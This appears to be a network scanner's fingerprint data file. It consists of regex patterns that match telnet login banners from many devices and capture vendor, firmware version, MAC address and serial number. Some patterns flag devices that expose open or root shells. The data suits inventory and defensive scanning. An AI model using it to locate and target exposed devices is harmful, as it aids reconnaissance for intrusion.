-\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: -\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: -\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: -\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: -\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: -\xff\xfb\x01\r\nD-Link Access Point login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: -\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: -\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: -\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: -\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# -\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) -\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H -\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} -\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* -\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) -\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n -\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r -\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n -\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n -\xff\xfb\x01\(Enable\) Password\? -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) -\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: -\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ -\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd -\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP -\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : -\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r -\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: -\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : -\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t -\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: -\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: -\xff\xfb\x01Symbol Access Point User/Admin password: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : -\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H -\r\n\r\nPassword required, but none set\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# -\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: -refused in\.telnetd from [-\w_.]+ logged\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n -\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 -BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: -\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 -\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. -\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: -\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: -\xff\xfb\x01\r\nAIRAYA login: -\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: -AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: -\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) -\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: -\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: -\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n -\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), -\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: -\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), -\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: -\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n -\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : -\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. -\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: -\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n -\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: -Connected\r\nUse log command to LOGON\r\n -\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: -\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version ([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : -uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> -SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n -Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd -\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: -\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> -\xff\xfb\x01\r\n3Com Access Point 7760 login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: -\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: -\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: -\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: -\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: -\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: -\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: -\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: -Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n -\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: -odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute -\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: -\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n -\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n -\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: -\r\nPRO2 Control Console\r\n -\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: -\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: -\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: -\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : -\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> -\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n -\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller -\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n -\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: -\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: -MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# -\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter -\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : -\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) -\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: -\n\rTA-005-FXO1-122M : CLI\n\rLogin : -\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r -\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> -\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: -\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: -\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: -\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b -Sorry, new remote sessions are disallowed by current switch configuration\. -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : -\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. -\r\n%connection closed by remote host!\0 -Sorry, telnet is not allowed on this port! -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: -\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> -\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: -\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 -\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n -\xff\xfb\x01\r\nNetDVRDVS: -nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n -\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: -\0\0\0H\0\0\0\x02\x0fTimeEdit131\. 